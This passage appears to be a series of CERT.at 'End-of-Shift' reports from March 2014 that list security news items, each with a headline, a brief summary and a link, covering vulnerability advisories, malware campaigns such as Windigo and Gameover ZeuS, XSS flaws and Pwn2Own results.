Developers rely too heavily on HTTPS and forgo basic security measures. Using a man-in-the-middle attack, security researchers were able to look into the traffic between the app server and the apps - and discovered some odd things.
---------------------------------------------
http://www.golem.de/news/protokollanalyse-mogeln-im-quizduell-1403-105276-r…
*** Cisco IronPort AsyncOS Software for ESA and SMA File Validation Flaw Lets Remote Authenticated Users Execute Arbitrary Code ***
---------------------------------------------
http://www.securitytracker.com/id/1029937
*** SA-CONTRIB-2014-033 - Nivo Slider - Cross Site Scripting ***
---------------------------------------------
Advisory ID: DRUPAL-SA-CONTRIB-2014-033
Project: Nivo Slider (third-party module)
Version: 7.x
Date: 2014-March-19
Security risk: Moderately critical
Exploitable from: Remote
Vulnerability: Cross Site Scripting
Description
Nivo Slider provides a way to showcase featured content. Nivo Slider gives administrators a simple method of adding slides to the slideshow, an administration interface to configure slideshow settings, and simple slider positioning using the Drupal block system. The module doesn't...
---------------------------------------------
https://drupal.org/node/2221481
=======================
= End-of-Shift report =
=======================
Timeframe: Dienstag 18-03-2014 18:00 − Mittwoch 19-03-2014 18:00
Handler: Alexander Riepl
Co-Handler: Stephan Richter
*** Apache Update Resolves Security Vulnerabilities ***
---------------------------------------------
Apache has released version 2.4.9 of its ubiquitous HTTP web server (HTTPD), resolving two security vulnerabilities and a number of other bugs in the process.
---------------------------------------------
http://threatpost.com/apache-update-resolves-security-vulnerabilities/104849
*** Ebury rootkit: Zombie servers attack half a million computers every day ***
---------------------------------------------
The victims of the malware campaign "Operation Windigo" include kernel.org and cPanel. The servers infected with the Ebury rootkit send spam and attack visitors of the compromised websites.
---------------------------------------------
http://www.heise.de/security/meldung/Ebury-Rootkit-Zombie-Server-greifen-ta…
*** Wide Gap Between Attackers, BIOS Forensics Research ***
---------------------------------------------
Advanced attackers are ahead of researchers when it comes to understanding firmware vulnerabilities and BIOS forensics, experts from MITRE and Intel said during last week's CanSecWest.
---------------------------------------------
http://threatpost.com/wide-gap-between-attackers-bios-forensics-research/10…
*** Avast toolbar with shopping spy ***
---------------------------------------------
The browser toolbar, which ends up on the computer bundled with the antivirus software among other ways, looks over the user's shoulder while shopping and inserts competing offers into shop pages.
---------------------------------------------
http://www.heise.de/security/meldung/Avast-Toolbar-mit-Shopping-Spion-21496…
*** Data suggests Android malware threat greatly overhyped ***
---------------------------------------------
It's no secret that many in the security industry perceive Google Inc.'s Android mobile platform to be plagued by malware, but Android security team lead Adrian Ludwig has made it his mission to eradicate the disingenuous meme of the burgeoning Android malware apocalypse.
---------------------------------------------
http://searchsecurity.techtarget.com/news/2240216335/Data-suggests-Android-…
*** Full Disclosure mailing list shuts down ***
---------------------------------------------
The well-known security mailing list has been closed by its operator until further notice. In the past, Full Disclosure was repeatedly the venue for the disclosure of important security vulnerabilities.
---------------------------------------------
http://www.heise.de/security/meldung/Mailingliste-Full-Disclosure-macht-dic…
*** 10 Years of Mobile Malware: How Secure Are You? ***
---------------------------------------------
Believe it or not, but it has been 10 years since the first mobile malware was created! On the infographic below, you can see a brief overview of the most important malware events in the past 10 years, with a short description of each of them.
---------------------------------------------
https://www.linkedin.com/today/post/article/20140316112657-67886711-10-year…
*** New Exploits Arrive for Old PHP Vulnerability ***
---------------------------------------------
New exploits for a two-year-old PHP vulnerability popped up in October that allow hackers to run code on websites running vulnerable versions of the web development framework.
---------------------------------------------
http://threatpost.com/new-exploits-arrive-for-old-php-vulnerability/104881
*** Fake Tor browser for iOS laced with adware, spyware, members warn ***
---------------------------------------------
Title available since November raises questions about App Store vetting process.
---------------------------------------------
http://feeds.arstechnica.com/~r/arstechnica/security/~3/qB_-ioinSh4/
*** WordPress Subscribe To Comments Reloaded Plugin Cross-Site Request Forgery Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/57015
*** Moodle Multiple Security Issues and Multiple Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/57331
*** Samba smbcacls security bypass ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/91849
=======================
= End-of-Shift report =
=======================
Timeframe: Montag 17-03-2014 18:00 − Dienstag 18-03-2014 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Google's Public DNS Hijacked for 22 Minutes ***
---------------------------------------------
The attackers hijacked the 8.8.8.8/32 DNS server for approximately 22 minutes. According to BGPmon, networks in Brazil and Venezuela were impacted. A screenshot published by the company shows that the traffic was redirected to BT Latin America's networks.
---------------------------------------------
http://news.softpedia.com/news/Google-s-Public-DNS-Hijacked-for-22-Minutes-…
*** Anonymisation: Sniper attack knocks out Tor nodes ***
---------------------------------------------
With a so-called sniper attack, attackers can not only selectively take individual Tor nodes out of action, but also paralyse the entire network within a few minutes. A patch has already been developed.
---------------------------------------------
http://www.golem.de/news/anonymisierung-sniper-angriff-legt-tor-nodes-lahm-…
*** Scans for FCKEditor File Manager, (Mon, Mar 17th) ***
---------------------------------------------
FCKEditor (now known as CKEditor [1]) is a popular full featured GUI editor many web sites use. For example, you frequently find it with blog systems like WordPress or as part of commenting/forum systems. As an additional feature, a filemanager can be added to allow users to upload images or other files. Sadly, while a very nice and functional plugin, this feature is frequently not well secured and can be used to upload malicious files. We have seen some scans probing specifically...
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17821&rss
*** Background of the Typo3 hack still unclear ***
---------------------------------------------
The Typo3 Association has no information about the vulnerability behind the casino spam hack that affects many Typo3 websites, and suspects that the hack has other causes. Sites without a Typo3 installation are reportedly also affected.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Hintergruende-des-Typo3-Hacks-weiter…
*** Hidden Windigo UNIX ZOMBIES are EVERYWHERE ***
---------------------------------------------
Check and wipe: The la-la-la-it's-not-happening plan is no good. Hackers using a Trojan seized control of over 25,000 Unix servers worldwide to create a potent spam and malware distribution platform.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/03/18/windigo_uni…
*** Threatglass Tool Gives Deep Look Inside Compromised Sites ***
---------------------------------------------
Trying to enumerate the compromised sites on the Internet is a Sisyphean task. Luckily, it's not a task that anyone really needs to perform any longer, especially now that Barracuda Labs has released its new Threatglass tool, a Web-based frontend that allows users to query a massive database of compromised sites to get detailed information...
---------------------------------------------
http://threatpost.com/threatglass-tool-gives-deep-look-inside-compromised-s…
*** March 2014 Security Bulletin Webcast and Q&A ***
---------------------------------------------
Today we published the March 2014 Security Bulletin Webcast Questions & Answers page. We answered eight questions in total, with the majority focusing on the updates for Windows (MS14-016) and Internet Explorer (MS14-012). One question that was not answered on air has been included on the Q&A page.
---------------------------------------------
http://blogs.technet.com/b/msrc/archive/2014/03/17/march-2014-security-bull…
*** When ASLR makes the difference ***
---------------------------------------------
We wrote several times in this blog about the importance of enabling Address Space Layout Randomization mitigation (ASLR) in modern software because it's a very important defense mechanism that can increase the cost of writing exploits for attackers and in some cases prevent reliable exploitation. In today's blog, we'll go through ASLR one more time to show in practice how it can be valuable to mitigate two real exploits seen in the wild and to suggest solutions for programs...
---------------------------------------------
https://blogs.technet.com/b/srd/archive/2014/03/12/when-aslr-makes-the-diff…
*** Red Hat plans unified security management for Fedora 21 ***
---------------------------------------------
One crypto policy to bind them. Red Hat is planning a significant change to how its Fedora Linux distribution handles crypto policy, to ship with the due-in-late-2014 Fedora 21 release.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/03/18/red_hat_pla…
*** Open-Xchange AppSuite 7.4.1 / 7.4.2 Cross Site Scripting ***
---------------------------------------------
Topic: Open-Xchange AppSuite 7.4.1 / 7.4.2 Cross Site Scripting
Risk: Low
Text:
Product: Open-Xchange AppSuite
Vendor: Open-Xchange GmbH
Internal reference: 31065
Vulnerability type: Cross Site Scriptin...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014030134
*** Security Advisory-Y.1731 Vulnerability on Some Huawei Switches ***
---------------------------------------------
Y.1731 is an ITU-T recommendation for OAM features on Ethernet-based networks. Y.1731 provides connectivity detection, diagnosis, and performance monitoring for VLAN/VSI services on MANs.
Some Huawei switches support Y.1731 and are therefore affected by a Y.1731 vulnerability in the processing of special packets. The vulnerability causes the switches to restart (Vulnerability ID: HWPSIRT-2013-1165).
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-advisor…
*** OpenSSH AcceptEnv Wildcard Processing Flaw May Let Remote Authenticated Users Bypass Environment Restrictions ***
---------------------------------------------
http://www.securitytracker.com/id/1029925
*** DSA-2880 python2.7 ***
---------------------------------------------
security update
---------------------------------------------
http://www.debian.org/security/2014/dsa-2880
*** Bugtraq: 2014 World Conference on IST - Madeira Island, April 15-17 ***
---------------------------------------------
The 2014 World Conference on Information Systems and Technologies
---------------------------------------------
http://www.securityfocus.com/archive/1/531513
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 14-03-2014 18:00 − Monday 17-03-2014 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Security Exploit Patched on vBulletin - PHP Object Injection ***
---------------------------------------------
The vBulletin team just issued a warning, and released patches for a security exploit that affected all versions of vBulletin including 3.5, 3.6, 3.7, 3.8, 4.X, 5.X. They recommend that anyone using vBulletin apply these patches as soon as possible. Here is part of their announcement: A security issue has been found that affects all...
---------------------------------------------
http://blog.sucuri.net/2014/03/security-exploit-patched-on-vbulletin-php-ob…
*** Pwn2Own results for Wednesday (Day One) ***
---------------------------------------------
At Pwn4Fun, Google delivered a very impressive exploit against Apple Safari launching Calculator as root on Mac OS X. ZDI presented a multi-stage exploit, including an adaptable sandbox bypass, against Microsoft Internet Explorer, launching Scientific Calculator (running in medium integrity) with continuation.
---------------------------------------------
http://www.pwn2own.com/2014/03/pwn2own-results-for-wednesday-day-one/
*** Pwn2Own results for Thursday (Day Two) ***
---------------------------------------------
... Vulnerabilities were successfully presented on Thursday in the Pwn2Own competition ... against Google Chrome, Microsoft Internet Explorer, Apple Safari, Mozilla Firefox, Adobe Flash.
---------------------------------------------
http://www.pwn2own.com/2014/03/pwn2own-results-thursday-day-two/
*** Encryption: CAESAR competition seeks authenticated encryption ***
---------------------------------------------
The first round of the CAESAR competition has begun. The goal: cryptographers are looking for better algorithms for authenticated encryption.
---------------------------------------------
http://www.golem.de/news/verschluesselung-caesar-wettbewerb-sucht-authentif…
*** The Long Tail of ColdFusion Fail ***
---------------------------------------------
Earlier this month, I published a story about a criminal hacking gang using Adobe ColdFusion vulnerabilities to build a botnet of hacked e-commerce sites that were milked for customer credit card data. Today's post examines the impact that this botnet has had on several businesses, as well as the important and costly lessons these companies learned from the intrusions.
---------------------------------------------
http://krebsonsecurity.com/2014/03/the-long-tail-of-coldfusion-fail/
*** Asus Webstorage app falters again on SSL ***
---------------------------------------------
An SSL vulnerability in the Android app for the Asus online storage service Webstorage, which was supposed to have been fixed, has risen again: the current app version does not verify the server certificate presented by the online storage service.
---------------------------------------------
http://www.heise.de/security/meldung/Webstorage-App-von-Asus-schwaechelt-er…
*** iOS 7 has weak random number generator ***
---------------------------------------------
Trivial to break, says researcher
In an effort to improve iDevice security, Apple replaced its internal random number generator between iOS 6 and iOS 7 - but a security researcher believes Cupertino inadvertently downgraded security.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/03/16/ios_7_has_w…
*** VU#381692: Webmin contains a cross-site scripting vulnerability ***
---------------------------------------------
Vulnerability Note VU#381692: Webmin contains a cross-site scripting vulnerability
Original Release date: 14 Mar 2014 | Last revised: 14 Mar 2014
Overview: Webmin 1.670, and possibly earlier versions, contains a cross-site scripting vulnerability.
Description: CWE-79: Improper Neutralization of Input During Web Page Generation (Cross-site Scripting). Webmin 1.670, and possibly earlier versions, contains a cross-site scripting vulnerability in the "search" parameter of the view.cgi...
---------------------------------------------
http://www.kb.cert.org/vuls/id/381692
*** Siemens SIMATIC S7-1500 CPU Firmware Vulnerabilities ***
---------------------------------------------
Siemens and Positive Technology researchers (Yury Goltsev, Llya Karpov, Alexey Osipov, Dmitry Serebryannikov and Alex Timorin) have identified nine firmware vulnerabilities in the Siemens SIMATIC S7-1500 CPU Firmware. Siemens has produced a patch that mitigates these vulnerabilities. These vulnerabilities could be exploited remotely.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-073-01
*** OpenX 2.8.11 Cross Site Request Forgery ***
---------------------------------------------
Topic: OpenX 2.8.11 Cross Site Request Forgery Risk: Low Text: Hello, Multiple cross-site request forgery (CSRF) vulnerabilities in OpenX 2.8.11 and earlier allow remote attackers to ...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014030121
*** iOS 7 Arbitrary Code Execution ***
---------------------------------------------
When a specific value is supplied in the USB Endpoint descriptor for a HID device, the Apple device kernel panics and reboots.
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014030126
*** GNU Readline Insecure usage of temporary files ***
---------------------------------------------
Topic: GNU Readline Insecure usage of temporary files Risk: Medium Text: Whilst auditing some code for insecure uses of temporary files I spotted a potential area of concern in GNU readline. (...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014030129
*** HPSBNS02969 rev.1 - HP NonStop Servers running Java 7, Multiple Remote Vulnerabilities affecting Confidentiality, Integrity and Availability ***
---------------------------------------------
Potential vulnerabilities have been identified with HP NonStop Servers running Java 7. The vulnerabilities could be exploited remotely affecting confidentiality, integrity and availability.
---------------------------------------------
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 13-03-2014 18:00 − Friday 14-03-2014 18:00
Handler: Robert Waldner
Co-Handler: Alexander Riepl
*** Bugtraq: [ MDVSA-2014:057 ] mediawiki ***
---------------------------------------------
Updated mediawiki packages fix multiple vulnerabilities:
---------------------------------------------
http://www.securityfocus.com/archive/1/531452
*** Vuln: Mutt Mailreader mutt_copy_hdr() Function Heap Based Buffer Overflow Vulnerability ***
---------------------------------------------
Mutt mailreader is prone to a heap-based buffer-overflow vulnerability.
Successful exploitation of this issue allows an attacker to execute arbitrary code in the context of the application; failed attempts lead to a denial of service.
Versions of Mutt prior to 1.5.23 are vulnerable.
---------------------------------------------
http://www.securityfocus.com/bid/66165
*** Schneider Electric StruxureWare SCADA Expert ClearSCADA Parsing Vulnerability ***
---------------------------------------------
OVERVIEW
Andrew Brooks identified and reported to The Zero Day Initiative (ZDI) a File Parsing Vulnerability: Schneider Electric StruxureWare SCADA Expert ClearSCADA ServerMain.exe OPF File Parsing Vulnerability. Schneider Electric has prepared workarounds and helped develop security upgrades for a third-party component that is affected.
AFFECTED PRODUCTS
The following SCADA Expert ClearSCADA versions are affected:
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-072-01
*** VU#807134: WatchGuard Fireware XTM devices contain a cross-site scripting vulnerability ***
---------------------------------------------
Vulnerability Note VU#807134 WatchGuard Fireware XTM devices contain a cross-site scripting vulnerability
...
Overview WatchGuard Fireware XTM 11.8.1, and possibly earlier versions, contains a cross-site scripting vulnerability.
---------------------------------------------
http://www.kb.cert.org/vuls/id/807134
*** Squid Flaw in SSL-Bump Lets Remote Users Deny Service ***
---------------------------------------------
A remote user can send HTTPS requests to trigger a flaw in SSL-Bump and cause the target service to crash.
Specially crafted requests are not required to trigger this vulnerability.
---------------------------------------------
http://www.securitytracker.com/id/1029908
*** Wireshark NFS/M3UA/RLC Dissector Bugs Let Remote Users Deny Service and MPEG Buffer Overflow Lets Remote Users Execute Arbitrary Code ***
---------------------------------------------
Several vulnerabilities were reported in Wireshark. A remote user can cause arbitrary code to be executed on the target user's system. A remote user can cause denial of service conditions.
---------------------------------------------
http://www.securitytracker.com/id/1029907
*** Blogs of War: Don’t Be Cannon Fodder ***
---------------------------------------------
On Wednesday, KrebsOnSecurity was hit with a fairly large attack which leveraged a feature in more than 42,000 blogs running the popular WordPress content management system (this blog runs on WordPress). This post is an effort to spread the word to other WordPress users to ensure their blogs aren't used in attacks going forward.
---------------------------------------------
http://feedproxy.google.com/~r/KrebsOnSecurity/~3/TMHH3NsEOxo/
*** Cisco Cloud Portal Discloses Cryptographic Material That Lets Remote Users Decrypt Data ***
---------------------------------------------
A vulnerability was reported in Cisco Cloud Portal. A local user can obtain cryptographic material. A remote user with access to the cryptographic material can then decrypt data.
The Cisco Intelligent Automation for Cloud (Cisco IAC) binaries include fixed cryptographic material. A remote user that can access encrypted data from the target Cisco IAC installation can decrypt the data.
---------------------------------------------
http://www.securitytracker.com/id/1029915
*** Google Docs Users Targeted by Sophisticated Phishing Scam ***
---------------------------------------------
We see millions of phishing messages every day, but recently, one stood out: a sophisticated scam targeting Google Docs and Google Drive users. The scam uses a simple subject of "Documents" and urges the recipient to view an important document on Google Docs by clicking on the included link.
---------------------------------------------
http://www.symantec.com/connect/blogs/google-docs-users-targeted-sophistica…
*** McAfee Email Gateway Input Validation Flaws Let Remote Authenticated Users Inject SQL and Operating System Commands ***
---------------------------------------------
Several vulnerabilities were reported in McAfee Email Gateway. A remote authenticated user can execute arbitrary operating system commands on the target system. A remote authenticated user can inject SQL commands.
---------------------------------------------
http://www.securitytracker.com/id/1029916
*** Firefox Exec Shellcode From Privileged Javascript Shell ***
---------------------------------------------
Topic: Firefox Exec Shellcode From Privileged Javascript Shell
Risk: Medium
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014030113
*** A decade of securing Europe’s cyber future. The EU’s cyber security Agency ENISA is turning ten, and is looking at future challenges. ***
---------------------------------------------
In the “eternal marathon” against cyber criminals, there is a “constant, increasing need for ENISA”.
---------------------------------------------
http://www.enisa.europa.eu/media/press-releases/a-decade-of-securing-europe…
*** lighttpd Directory Traversal and SQL Injection Vulnerabilities ***
---------------------------------------------
Two vulnerabilities have been reported in lighttpd, which can be exploited by malicious people to disclose potentially sensitive information and conduct SQL injection attacks.
...
Successful exploitation requires mod_evhost and/or mod_simple_vhost modules to be enabled.
---------------------------------------------
https://secunia.com/advisories/57333
*** Samsung Backdoor May Not Be as Wide Open as Initially Thought ***
---------------------------------------------
... As demonstrated in a proof-of-concept attack, this allowed certain baseband code to gain access to a device’s storage under a specific set of circumstances. But upon closer inspection, this backdoor is most likely not as bad as it was initially made out to be.
---------------------------------------------
http://www.xda-developers.com/android/samsung-backdoor-may-not-be-as-wide-o…
*** EU Parliament votes for mandatory reporting of cyber attacks ***
---------------------------------------------
The members of parliament have adopted, by a large majority but with some amendments, a draft directive of the EU Commission on network and information security. Member states are to strengthen their cooperation.
---------------------------------------------
http://www.heise.de/newsticker/meldung/EU-Parlament-stimmt-fuer-Meldepflich…
*** Gameover ZeuS Jumps on the Bitcoin Bandwagon ***
---------------------------------------------
We're always asking our analysts the following question: seen anything interesting? And yesterday, the answer to our query was this: Gameover ZeuS has some additional strings. Very interesting, indeed. Here's a screenshot of the decrypted strings:
• aBitcoinQt_exe
• aBitcoind_exe
• aWallet_dat
• aBitcoinWallet
• aBitcoinWalle_0
Bitcoin wallet stealing has really moved up from the bush leagues. Gameover ZeuS is a pro. Analysis is ongoing. Here's the SHA1:
---------------------------------------------
http://www.f-secure.com/weblog/archives/00002685.html
*** Target staff IGNORED security alerts as hackers slurped 40m customers' card details ***
---------------------------------------------
Reports say staff dithered while hackers went to town
Staff at US retailer Target failed to stop the theft of 40 million credit card records last December despite an escalating series of alarms from the company's security systems.…
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/03/14/target_fail…
*** Debian Security Advisory DSA-2879-1 libssh -- security update ***
---------------------------------------------
It was discovered that libssh, a tiny C SSH library, did not reset the state of the PRNG after accepting a connection. A server mode application that forks itself to handle incoming connections could see its children sharing the same PRNG state, resulting in a cryptographic weakness and possibly the recovery of the private key.
---------------------------------------------
http://www.debian.org/security/2014/dsa-2879
*** Sophos UTM TCP Stack Memory Leak Denial of Service Vulnerability ***
---------------------------------------------
A vulnerability has been reported in Sophos UTM, which can be exploited by malicious people to cause a DoS (Denial of Service).
The vulnerability is caused by an error within the TCP stack and can be exploited to cause a memory leak.
The vulnerability is reported in versions prior to 9.109.
---------------------------------------------
https://secunia.com/advisories/57344
*** Blog: Analysis of Malware from the MtGox leak archive ***
---------------------------------------------
A few days ago the personal blog and Reddit account of MtGox CEO Mark Karpeles were hacked. Attackers used them to post a file, MtGox2014Leak.zip, which they claim contains valuable database dumps and specialized software for remote access to MtGox data. But this application is actually malware created to search for and steal Bitcoin wallet files from its victims. It seems that the whole leak was invented to infect computers with Bitcoin-stealer malware that takes advantage of people's keen interest in the MtGox topic.
---------------------------------------------
http://www.securelist.com/en/blog/8196/Analysis_of_Malware_from_the_MtGox_l…
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 12-03-2014 18:00 − Thursday 13-03-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Decoding Domain Generation Algorithms (DGAs) Part III - ZeusBot DGA Reproduction ***
---------------------------------------------
At this point, you can go ahead and close the two parent processes (since we are not interested in their functionality, for the sake of simply finding the DGA). So we know that we are interested in discovering how this traffic is generated. So let's try to find out where it originates. Earlier, using API Monitor, we saw that explorer was using several functions within WinINet.dll:...
---------------------------------------------
http://vrt-blog.snort.org/2014/03/decoding-domain-generation-algorithms.html
*** F-Secure interview: "We detect government trojans and don't want to change that" ***
---------------------------------------------
Malware created by governments does not always have to be as bad as 0zapftis, the Bavarian state trojan. For F-Secure's virus researcher Mikko Hypponen, what matters is that anti-malware companies can continue to work without restrictions in the future, as he said in a conversation with Golem.de.
---------------------------------------------
http://www.golem.de/news/f-secure-im-interview-wir-erkennen-staatstrojaner-…
*** WordPress XML-RPC PingBack Vulnerability Analysis ***
---------------------------------------------
There were news stories this week outlining how attackers are abusing the XML-RPC "pingback" feature of WordPress blog sites to launch DDoS attacks on other sites. This blog post will provide some analysis on this attack and additional information for websites to protect themselves. Not A New Vulnerability: The vulnerability in WordPress's XML-RPC API is not new. Here is data from the WordPress bug tracker from 7 years ago. While the vulnerability itself is not new,...
---------------------------------------------
http://feedproxy.google.com/~r/SpiderlabsAnterior/~3/MklfK5l9jYY/wordpress-…
*** A Detailed Examination of the Siesta Campaign ***
---------------------------------------------
Executive Summary FireEye recently looked deeper into the activity discussed in TrendMicro's blog and dubbed the "Siesta" campaign. The tools, modus operandi, and infrastructure used in the campaign present two possibilities: either the Chinese cyber-espionage unit APT1 is perpetrating this...
---------------------------------------------
http://www.fireeye.com/blog/technical/targeted-attack/2014/03/a-detailed-ex…
*** LightsOut EK Targets Energy Sector ***
---------------------------------------------
Late last year, the story broke that threat actors were targeting the energy sector with Remote Access Tools and Intelligence gathering malware. It would seem that the attackers responsible for this threat are back for more. This particular APT struck late February between 2/24-2/26. The attack began as a compromise of a third party law firm which includes an energy law practice known as
---------------------------------------------
http://feedproxy.google.com/~r/zscaler/research/~3/S2HhvPupa_0/lightsout-ek…
*** Trojan.Skimer.19 threatens banks ***
---------------------------------------------
March 4, 2014. Malware infecting the electronic innards of ATMs is not exactly a common phenomenon, so whenever such new kinds of programs emerge, they inevitably draw the attention of security specialists. Doctor Web's virus analysts got hold of a sample of Trojan.Skimer.19, which can infect ATMs. According to Doctor Web, banking system attacks involving Trojan.Skimer.19 persist to this day. Similar to its predecessors, the Trojan has its main payload incorporated into a dynamic link library...
---------------------------------------------
http://news.drweb.com/show/?i=4267&lng=en&c=9
*** Trojan.Rbrute hacks Wi-Fi routers ***
---------------------------------------------
March 5, 2014. Doctor Web's security researchers examined the Trojan.Rbrute malware, which is designed to crack Wi-Fi router access passwords using brute force and change the DNS server addresses specified in the configuration of these devices. Criminals use this malicious program to spread the file infector known as Win32.Sector. When launched on a Windows computer, Trojan.Rbrute establishes a connection with the remote server and stands by for instructions. One of them provides the Trojan with a...
---------------------------------------------
http://news.drweb.com/show/?i=4271&lng=en&c=9
*** Anatomy of a Control Panel Malware Attack, Part 1 ***
---------------------------------------------
Recently we've discussed how Control Panel (CPL) malware has been spreading in Latin America. In the past, we've analyzed in some detail how CPL malware works as well as the overall picture of how this threat spreads. In this post, we shall examine in detail how they spread, and how they relate with other malicious sites.
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/v3D2zLGXolU/
*** Ethical hacker backer hacked, warns of email ransack ***
---------------------------------------------
Switches registrars, tightens security after upsetting incident
The IT security certification body that runs the Certified Ethical Hacker programme has itself been hacked.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/03/13/ethical_hac…
*** Samsung: Galaxy devices have a backdoor in the modem processor ***
---------------------------------------------
A backdoor in the modem processor has been discovered in several smartphones and tablets from Samsung's Galaxy model range. Attackers could use it to access the data on the smartphone or tablet, or to modify data in order to spread malware. (Smartphone, Samsung)
---------------------------------------------
http://www.golem.de/news/samsung-galaxy-geraete-haben-eine-backdoor-im-mode…
*** Google hacks Mac OS X for a good cause ***
---------------------------------------------
The search engine giant's security team has demonstrated a serious attack on Mac OS X: when a web page was opened with Safari, code was executed as root. The demonstration hack took place in a new category of the Pwn2Own competition.
---------------------------------------------
http://www.heise.de/security/meldung/Google-hackt-Mac-OS-X-fuer-den-guten-Z…
*** Metasploit Weekly Update: There's a Bug In Your Brain ***
---------------------------------------------
The most fun module this week, in my humble opinion, is from Rapid7's own Javascript Dementer, Joe Vennix. Joe wrote up this crafty implementation of a Safari User-Assisted Download and Run Attack, which is not technically a vulnerability or a bug or anything -- it's a feature that ends up being a kind of a huge risk. Here's how it goes:...
---------------------------------------------
https://community.rapid7.com/community/metasploit/blog/2014/03/13/metasploi…
*** TCIPG Seminar: Dynamic Data Attacks on Real-Time Power System Operations ***
---------------------------------------------
With increasing dependence on modern information and communication technology, a future smart grid is potentially more vulnerable to coordinated cyber attacks launched by an adversary. In this talk, we consider several possible attack mechanisms aimed at disrupting real-time operations of a power grid. In particular, we are interested in dynamic attack strategies on the power system state estimation that lead to infeasible real-time dispatch and disrupt the real-time market operation.
---------------------------------------------
http://tcipg.org/news/TCIPG-Seminar-2014-Mar-7-Tong
*** Security update available for Adobe Shockwave Player ***
---------------------------------------------
Adobe has released a security update for Adobe Shockwave Player 12.0.9.149 and earlier versions on the Windows and Macintosh operating systems. This update addresses a critical vulnerability that could potentially allow an attacker to remotely take control of the affected system.
---------------------------------------------
http://helpx.adobe.com/security/products/shockwave/apsb14-10.html
*** Security Bulletin: Multiple security vulnerabilities exist in IBM InfoSphere Information Server (CVE-2013-4057, CVE-2013-4058 and CVE-2013-4059) ***
---------------------------------------------
Security vulnerabilities exist in various versions of IBM InfoSphere Information Server or constituent products. See the individual descriptions for details. CVE(s): CVE-2013-4057, CVE-2013-4058, and CVE-2013-4059 Affected product(s) and affected version(s): IBM InfoSphere Information Server Versions 8.0, 8.1, 8.5, 8.7, and 9.1 running on all platforms
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_mul…
*** Bugtraq: PowerArchiver: Uses insecure legacy PKZIP encryption when AES is selected (CVE-2014-2319) ***
---------------------------------------------
http://www.securityfocus.com/archive/1/531440
*** SA-CONTRIB-2014-031 - Webform Template - Access Bypass ***
---------------------------------------------
Advisory ID: DRUPAL-SA-CONTRIB-2014-031
Project: Webform Template (third-party module)
Version: 7.x
Date: 2014-March-12
Security risk: Less critical
Exploitable from: Remote
Vulnerability: Access Bypass
Description: This module enables you to copy webform config from one node to another. The module doesn't respect node access when providing possible nodes to copy from. As a result, a user may be disclosed the titles of nodes he does not have view access to and as such he may be able to copy the webform...
---------------------------------------------
https://drupal.org/node/2216607
*** SA-CONTRIB-2014-030 - SexyBookmarks - Information Disclosure ***
---------------------------------------------
Advisory ID: DRUPAL-SA-CONTRIB-2014-030
Project: SexyBookmarks (third-party module)
Version: 6.x
Date: 2014-March-12
Security risk: Moderately critical
Exploitable from: Remote
Vulnerability: Information Disclosure
Description: The SexyBookmarks module is a port of the WordPress SexyBookmarks plug-in. The module adds social bookmarking using the Shareaholic service. The module discloses the private files location when Drupal 6 is configured to use private files. This vulnerability is mitigated by the fact...
---------------------------------------------
https://drupal.org/node/2216269
*** Mitsubishi Electric Automation MC-WorX Suite Unsecure ActiveX Control ***
---------------------------------------------
This advisory is a follow-up to the original alert, titled ICS-ALERT-13-259-01 Mitsubishi MC-WorX Suite Unsecure ActiveX Control, published September 16, 2013, on the NCCIC/ICS-CERT web site (this was originally incorrectly identified as MC-WorkX; the correct product name is MC-WorX).
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-051-02
*** Cisco Intelligent Automation for Cloud Cryptographic Implementation Issues ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** GNUpanel 0.3.5_R4 Cross Site Request Forgery / Cross Site Scripting ***
---------------------------------------------
Topic: GNUpanel 0.3.5_R4 Cross Site Request Forgery / Cross Site Scripting Risk: Medium Text:# Exploit Title :GNUpanel 0.3.5_R4 - Multiple Vulnerabilities # Vendor Homepage :http://wp.geeklab.com.ar/gl-en/gnupanel...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014030098
*** Proxmox Mail Gateway 3.1 Cross Site Scripting ***
---------------------------------------------
Topic: Proxmox Mail Gateway 3.1 Cross Site Scripting Risk: Low Text:I. VULNERABILITY - Multiplus XSS in Proxmox Mail Gateway 3.1 II. BACKGROUND - Proxmox Mail G...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014030097
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 11-03-2014 18:00 − Wednesday 12-03-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** When ASLR makes the difference ***
---------------------------------------------
We wrote several times in this blog about the importance of enabling Address Space Layout Randomization mitigation (ASLR) in modern software because it's a very important defense mechanism that can increase the cost of writing exploits for attackers and in some cases prevent reliable exploitation. In today's blog, we'll go through ASLR one more time to show in practice how it can be valuable to mitigate two real exploits seen in the wild and to suggest solutions for programs...
---------------------------------------------
